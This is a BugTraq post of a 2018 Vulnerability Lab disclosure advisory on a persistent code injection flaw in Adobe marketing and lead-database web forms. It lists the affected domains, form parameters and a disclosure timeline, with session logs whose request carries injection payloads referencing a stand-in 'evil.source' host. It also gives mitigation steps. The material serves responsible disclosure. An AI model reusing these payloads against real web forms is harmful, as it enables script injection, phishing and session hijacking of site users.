BugTraq
Back to list
|
Post reply
Adobe Systems - Arbitrary Code Injection Vulnerability
Jul 19 2018 02:19PM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Adobe Systems - Arbitrary Code Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2120
PSIRT ID: 7873
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-a
rbitrary-codes-main-lead-database-adobe-systems
Acknowledgements: (Industry Partners)
https://helpx.adobe.com/security/acknowledgements.html
Release Date:
=============
2018-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
2120
Common Vulnerability Scoring System:
====================================
6.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
5.000â?¬ - 10.000â?¬
Product & Service Introduction:
===============================
Adobe Systems Incorporated commonly known as Adobe, is an American
multinational computer software company.
The company is headquartered in San Jose, California, United States.
Adobe has historically focused upon the creation of
multimedia and creativity software products, with a more recent foray
towards rich Internet application software
development. It is best known for Photoshop, an image editing software,
Acrobat Reader, the Portable Document Format
(PDF), and Adobe Creative Suite, as well as its successor, Adobe
Creative Cloud.
(COpy of the Homepage: https://en.wikipedia.org/wiki/Adobe_Systems )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered arbitrary
code execution vulnerability in the Adobe Systems main lead database
management system.
Vulnerability Disclosure Timeline:
==================================
2018-02-05: Researcher Notification & Coordination (Security Researcher)
2018-02-08: Vendor Notification (Adobe PSIRT - Security Department)
2018-02-12: Vendor Response/Feedback (Adobe PSIRT - Security Department)
2018-02-16: Reporter Response/Feedback #1 (Security Researcher)
2018-02-27: Reporter Response/Feedback #2 (Security Researcher)
2018-03-04: Reporter Response/Feedback #3 (Security Researcher)
2018-06-14: Vendor Fix/Patch (Adobe Service Developer Team)
2018-06-15: Security Acknowledgements (Adobe PSIRT - Security Department)
2018-06-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Adobe Systems
Product: Main Lead DBMS - *.adobesystems.com 2018 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure Program
Technical Details & Description:
================================
The vulnerability laboratory core research team discovered an arbitrary
code injection vulnerability in the adobe systems main lead database
management system.
The issue allows remote attackers to inject own malicious script codes
and system specific codes with persistent attack vector to the
application-side of
the vulnerable modules context or affected internal services.
The arbitrary code injection vulnerability is located in the external
services associated with the content of adobe systems subdomain services.
Attackers are able to attack the adobe system's lead database by
inserting arbitrary code over other database layers. This issue allows an
attacker to perform the injection using an external service form. After
the content has been delivered, the data is stored in the sub-service
database management system. Over time, the database contents of the sub
services are backed up and synchronized with the main database of the
adobe systems. In the case of our research, we identified several
external services to attack the sub-services of the adobe system and
finally
deliver the faulty content within the main lead database.
The injection points are the external services. The exeuction points are
located in the backend when processing to manage the contents and
when the content is delivered through the main lead database to other
customers or business clients (commercials, mailing and notify). The
vulnerable domain that executed the contents are adobesystems.com and
info.adobesystems.com. The request method to inject is POST and the
attack vector is located on the application-sideof adobe-systems. To
register and send an email no user account is required.
Successful exploitation of the arbitrary code injection vulnerability
results in malformed dbms injects, dbms compromise, session hijacking,
persistent phishing attacks, persistent external redirects to malicious
source and manipulation of affected or connected application modules.
Vulnerable Micro Service(s):
[+] apps.enterprise.adobe.com
[+] offflivestream.creativecloud.adobeevents.com/
[+] summit-emea.adobe.com
Vulnerable Sub Service(s):
[+] landing.adobe.com
[+] offers.adobe.com
[+]
sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s311
8621512273
Request Method(s):
[+] POST
Vulnerable File(s):
[+] m.jsp
[+] adobe_econsultancy_digital_trends_2017.html
[+] submit.html
[+] form.html
Parameter(s):
[+] firstname
[+] lastname
[+] companyname
Affected Domain(s):
[+] adobe.com
[+] info.adobesystems.com
[+] t.info.adobesystems.com
[+] m.info.adobesystems.com
[+] t-info.mail.adobe.com
Proof of Concept (PoC):
=======================
The arbitrary code injection vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
1. PoC: Injection Points External
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit
https://offflivestream.creativecloud.adobeevents.com/register/registrati
on/form
https://summit-emea.adobe.com/emea/registration/?sdid=ZFN4FLWT&mv=email
2. PoC: Followed Sub Systems
http://landing.adobe.com/
https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.h
tml
https://offers.adobe.com/de/de/marketing/offers/adobe_econsultancy_digit
al_trends_2017.html
http://t-info.mail.adobe.com/r/?id=t3100ff18,90990a66,90990bea
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.
5.0/s3118621512273
3. PoC: Execution Points
https://www.adobe.com/de/modal-offers/how-to-data-to-customer-intelligen
ce.html
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea733a
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40
HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D
Note: The following example shows
1. Enterprise to stats adobe
2. After that occurs a sync to the sub domain service
3. Then the data is merged to the info adobe service
4. Some sync and backups later the content is inside the main lead database
--- PoC Session Logs (POST Inject)---
Status: 200[OK]
GET
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit?callback=jQu
ery1102013829541567907688_1518951745795&id=1&l=3&d=%2Fcontent%2Fmicrosit
es%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers%2Fadobe_econsultancy_di
gital_trends_2017.html&Form1%5B14%5D=822&Form1%5B15%5D=829&Form1%5B10%5D
=a%22%3E%3C+src%3Devil.source%3E%3C%3E&Form1%5B33%5D=https%3A%2F%2Fwww.t
est.de%2F%22%3E%3Crc%3Devil.source%3E%3C%3E&Form1%5B95%5D=2746&Form1%5B8
%5D=c%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B9%5D=b%22%3E%3Csrc%3Dev
il.source%3E%3C%3E&Form1%5B1%5D=tester23%40evolutionsec.com&Form1%5B11%5
D=01925723572723&Form1%5B16%5D=31337&Form1%5B18%5D=462&Form1%5B19%5D=292
2&Form1%5B20%5D=72&Form1%5B130%5D=&Form1%5B35%5D=0&Form1%5B84%5D=0&Form1
%5B84%5D=1&Form1%5B85%5D=0&Form1%5B85%5D=1&Form1%5B87%5D=0&Form1%5B87%5D
=1&Form1%5B86%5D=0&Form1%5B77%5D=1&Form1%5B78%5D=1&Form1%5B79%5D=1&Form1
%5B80%5D=&Form1%5B89%5D=&Form1%5B6%5D=marketing_web_form&Form1%5B7%5D=wh
itepaper_form&Form1%5B31%5D=EXPERIENCEMANAGERSOLN&Form1%5B36%5D=70114000
002Cc8OAAS&Form1%5B37%5D=7011O000002Oq5lQAC&Form1%5B38%5D=&Form1%5B39%5D
=&Form1%5B40%5D=&Form1%5B44%5D=&Form1%5B45%5D=&Form1%5B46%5D=&Form1%5B47
%5D=&Form1%5B48%5D=&Form1%5B49%5D=&Form1%5B50%5D=&Form1%5B90%5D=DESBU&Fo
rm1%5B102%5D=&Form1%5B104%5D=&Form1%5B109%5D=EAIaIQobChMIxam646ev2QIV1sq
yCh352QaoEAMYAiAAEgLiEvD_BwE&Form1%5B115%5D=&Form1%5B116%5D=&Form1%5B122
%5D=&Form1%5B123%5D=&Form1%5B124%5D=&Form1%5B125%5D=&Form1%5B126%5D=&For
m1%5B127%5D=&Form1%5B128%5D=&Form1%5B129%5D=&Form1%5B120%5D=&ajax=faas-f
orm-1&_=1518951745799
Mime Type[application/json]
Request Header:
Host[apps.enterprise.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trend
s_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_Bw
E&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=sea
rch&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-
system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17
581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-151955654
7%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xz
PWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-400003
05C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Ad
igitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550
487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C15189537
26867%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.co
m%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html
%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252
C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobeno
nacdcprod%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doff
ers.adobe.com%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigi
tale_trends_2017%252526link%25253Dd2d1d3d2A1d1F2d22j1-Abschicken%252526r
egion%25253Dother%252526pageIDType%25253D1%252526.activitymap%252526.a%2
52526.c%2526adbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%25252
6a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525
253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.h
tml%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%2
5253D1%252526.activitymap%252526.a%252526.c%3B;
AWSALB=SbTNAUwD4VWBfGie5pg1LBkQ7ycVDw3Fzp27qOKDkJWVXWlsMBWc+ZWO6kN7yUrqg
gRU8u1gRwmDINdgNj0ugIUmSdwvQN0J9S2u3LeTlwIni2swslD5rm7Jgw+R;
PHPSESSID=ggu22jh4hpu53mpubl7udpmju3;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d3
4f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=adbadobefaasprod%252Cadbadobeglobalapp%3D%2526c.%2526a.%2526activit
ymap.%2526page%253Doffers.adobe.com%25253Ade%25253Ade%25253Amarketing%25
253Alandings%25253Adigitale_trends_2017.html%2526link%253DAbschicken%252
6region%253Dfaas-form-1%2526pageIDType%253D1%2526.activitymap%2526.a%252
6.c]
Connection[keep-alive]
Response Header:
content-type[application/json; charset=UTF-8]
content-length[445]
server[Apache]
expires[Thu, 19 Nov 1981 08:52:00 GMT]
cache-control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
pragma[no-cache]
access-control-allow-origin[*]
set-cookie[AWSALB=A3qFidf0O5y8FJMPYy8yPurGXw6U0pm1vsgi9RZbDaOZjkaQdp9cdZ
ICl9KMU2yldLT8dDmkmf0oheGoizsb/x4D/1If/GfJZbDXNeZi0pkdbeLLupJo4azCKowa;
Expires=Sun, 25 Feb 2018 11:05:26 GMT; Path=/
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=offers.adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=apps.enterprise.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=offers.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=apps.enterprise.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure]
X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.
5.0/s3118621512273
Mime Type[image/gif]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trend
s_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_Bw
E&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38
&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-mana
gement-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Content-Length[2181]
Content-Type[text/plain;charset=UTF-8]
Origin[https://offers.adobe.com]
DNT[1]
Connection[keep-alive]
POST-Daten:
AQB[1]
ndh[1]
pf[1]
t[18%2F1%2F2018%2012%3A5%3A28%200%20-60]
mid[70200303268859877472538284957896691642]
aid[2D44AEA10530CAFD-40000305C000F505]
aamlh[6]
ce[UTF-8]
cdp[2]
fpCookieDomainPeriods[2]
pageName[faaswc%3AFaaS%20Form%20Submission]
g[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigi
tale_trends_2017.html%3Fgclid%3D
EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O0
00002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_k
wcid%3DAL%213085%213%21250014124781%21]
c.[]
adb.[]
app.[]
name[1]
namespace[faaswc]
category[webComponent]
version[3.0.0]
.app[]
state.[]
location[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings
%2Fdigitale_trends_2017.html
%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_c
id%3D7011O000002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_k
wcid%3DAL%213085%213%21250014124781
%21b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A
20180218110223%3As]
.state[]
.adb[]
faaswc.[]
form.[]
id[1]
.form[]
.faaswc[]
.c[]
aamb[RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y]
c36[unspecified]
c37[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdi
gitale_trends_2017.html%3Fgclid%3
DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O
000002Oq5lQAC%26s_iid%3D70114000002Cc8O
AAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%21308
5%213%21250014124781%21b%21%21g%21%21
content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3A
s]
c38[form_1]
c39[linked_in%7Cjs%7Cfaas_submission%7Csfdc%7Cdemandbase]
c42[%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffer
s
%2Fadobe_econsultancy_digital_trends_2017.html%3Ffaas_unique_submission_
id%3D78D1E035-F1C6-4261-4EA0-C82041EB2A11]
a.[]
activitymap.[]
page[offers.adobe.com%3Ade%3Ade%3Amarketing%3Alandings%3Adigitale_trends
_2017.html]
link[Abschicken]
region[faas-form-1]
pageIDType[1]
.activitymap[]
.a[]
s[1366x768]
c[24]
j[1.8.5]
v[N]
k[Y]
bw[1366]
bh[564]
-g[b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A
20180218110223%3As]
mcorgid[9E1005A551ED61CA0A490D45%40AdobeOrg]
AQE[1]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
Expires[Sat, 17 Feb 2018 11:05:28 GMT]
Last-Modified[Mon, 19 Feb 2018 11:05:28 GMT]
Cache-Control[no-cache, no-store, max-age=0, no-transform, private]
Pragma[no-cache]
ETag["5A895DF8-FEF7-4E72B58E"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www56]
Content-Length[43]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[image/gif]
-
Status: 200[OK]
GET
https://sstats.adobe.com/b/ss/adbadobenonacdcprod/10/JS-2.5.0-D7QN/s3863
3784893508?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=18%2F1
%2F2018%2012%3A5%3A28%200%20-60&cid.&email_hash.&id=ff01e8531641c6ec1bce
c21c031b44eb&as=1&.email_hash&faas_unique_submission_id.&id=78D1E035-F1C
6-4261-4EA0-C82041EB2A11&as=1&.faas_unique_submission_id&.cid&d.&nsid=0&
jsonv=1&.d&D=D%3D&mid=70200303268859877472538284957896691642&aid=2D44AEA
10530CAFD-40000305C000F505&aamlh=6&ce=UTF-8&cdp=2&fpCookieDomainPeriods=
2&pageName=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trend
s_2017&g=https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings
%2Fdigitale_trends_2017.html%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352
QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D7011400000
2Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%
213085%213%21250014124781%21&events=event109&v28=offers.adobe.com%2Fde%2
Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html&v69=offers.adobe.
com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&v87=462&v88=72&v1
16=1&v147=78D1E035-F1C6-4261-4EA0-C82041EB2A11&v148=ff01e8531641c6ec1bce
c21c031b44eb&pe=lnk_o&pev2=FaaS%20Form%20Submission&c.&a.&activitymap.&p
age=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&
link=d2d1d3d2A1d1F2d22j1-Abschicken®ion=other&pageIDType=1&.activitym
ap&.a&.c&-g=b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABE
WVCpzB%3A20180218110223%3As&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&
AQE=1
Mime Type[application/x-javascript]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trend
s_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_Bw
E&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=sea
rch&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-
system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17
581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-151955654
7%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xz
PWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-400003
05C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Ad
igitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550
487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C15189537
28730%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.co
m%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html
%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252
C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobefa
asprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.
%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketi
ng%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1
%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activity
map%252526.a%252526.c%3B;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d3
4f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=%5B%5BB%5D%5D; faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb;
faas_form_1_status=completed]
Connection[keep-alive]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
ETag["5A895DF8-68DE-70672227"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www28]
Content-Length[6393]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[application/x-javascript]
Vulnerable Source: Service Email #1 (Test)
<tbody><tr><td class="mobile-spacer" style="width:60px;"
width="60"> </td>
<td class="headline" style="color:#2F303D; font-family:serenity,
Helvetica Neue,
Helvetica, Verdana, Arial, sans-serif; font-size:30px; line-height:25px;
padding-top:40px;"
align="center"><strong>RAGEN SIE HERAUS MIT GROSSARTIGEN
ERLEBNISSEN.</strong></td>
<td class="mobile-spacer" style="width:60px;" width="60"> </td></tr>
<tr><td class="mobile-spacer" style="width:60px;" width="60"> </td>
<td style="color:#2F303D; font-family:adobe-clean, Helvetica Neue Light,
Helvetica Light,
Helvetica, Verdana, Arial, sans-serif; font-size:16px; font-weight:100;
line-height:19px; padding-top:12px;"
align="center">Sehr geehrter Herr "<[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME])" <,<br=""><br>das
Erlebnis wächst sich gerade zum wichtigsten Faktor bei der
Kundenbindung aus. Erlebnisse, die persönlich,
begeisternd und konsistent auf jedem Kanal und Endgerät sind ââ?¬â??
das ist jetzt Ihr gröÃ?Ÿter Wettbewerbsvorteil.
<br><br>Besuchen Sie unseren Adobe Summit EMEA 2018. Erleben Sie bei
uns, was es für auÃ?Ÿergewöhnliche
digitale Erlebnisse wirklich braucht. Erfahren Sie von Unternehmen wie
<strong>Sky, DHL</strong> oder
<strong>Raiffeisen</strong>, wie sie diese neuartigen Erlebnis-Angebote
realisiert haben, die ihre Geschäftsmodelle
heute bereits von der Konkurrenz abheben.
Vulnerable Source: Service Email #2 (Test)
<td class="mobile" style="display: none; max-height:0; font-size:0;
height:0;padding:0;margin:0;width:0;" valign="top">
<a
href="http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46&a
mp;p1=7011O000002bSn9QAE&p2=0031400002mfNt5AAE"
target="_blank" style="color:#0099ff;"><img class="mobile-image"
alt="Weil wir innovativ bleiben, liegen wir weiterhin vorne."
src="https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketi
ng/events/images/other/49460e.de.because-we-keep-innovating-we-keep-lead
ing.640x597.jpg"
style="vertical-align:top;
overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;"
width="320" vspace="0" hspace="0" height="340" border="0">
</a>
</td>
<!--<![endif]-->
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td class="mobile-padding"
style="padding-left:30px;padding-right:30px;padding-top:14px;"
valign="top" bgcolor="#000000">
<table style="mso-cellspacing: 0px; mso-padding-alt: 0px 0px 0px 0px;
width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td class="mobile-text" style="color:#ffffff; font-family:Arial,
Helvetica, sans-serif; font-size:12px; line-height:18px;
padding-top:12px;" valign="top">
Sehr geehrter Herr "%20"[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME],<br=""><br>Forrester stuft Adobe als Leader bei Web-Analysen ein.
Lesen Sie in <i>The Forrester Wave<sup
style="line-height:95%;">ââ??¢</sup>: Web Analytics, Q4 2017</i>, weshalb
wir weiter den Ton angeben
ââ?¬â?? mit aussagekrÃ?¤ftigen und verwertbaren Einblicken fÃ?¼r alle
Mitarbeiter im Unternehmen.
</tr>
Reference(s):
https://www.adobe.com
http://t.info.adobesystems.com
http://m.info.adobesystems.com
https://offers.adobe.com
https://sstats.adobe.com
https://apps.enterprise.adobe.com
http://landing.adobe.com
http://t-info.mail.adobe.com
https://offflivestream.creativecloud.adobeevents.com
https://summit-emea.adobe.com
Solution - Fix & Patch:
=======================
1. Restrict and filter the input fields and disallow usage of script
code tags for inputs
2. Encode the context of the input fields during the post method request
submit to prevent malformed injects
3. Parse the firstname and lastname and company values in outgoing
emails with all adobe service templates
4. Implement a filter mechanism with exception-handling to parse
contents delivered from an external service to the sub-service followed
by the main lead database
5. Provide awareness to employees by explaining the specific impact of
the attack points to prevent the manual delivery
6. Develop a process to remove compromised information from the main
database or backups
7. Ensure that a web-firewall captures those incidents to alert or react
to ensure that an attacker is not able to move through the separate
database segments
The reported urls has been reported and disarmed already by the adobe
systems psirt and developer team. The issue has been patched in multiple
functions.
The forumulars are already restricted and the case scenario has been
full transparent delivered to ensure the problematic becomes visible to
adobe.
(Example:
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40
HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)
Security Risk:
==============
The security risk of the arbitrary code injection vulnerability in the
adobe web services are estimated as high.
Credits & Authors:
==================
Benjamin K.M. (Vulnerability Laboratory Core Research
Team)[research (at) vulnerability-lab (dot) com [email concealed]] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -
www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution
Security GmbH]â?¢
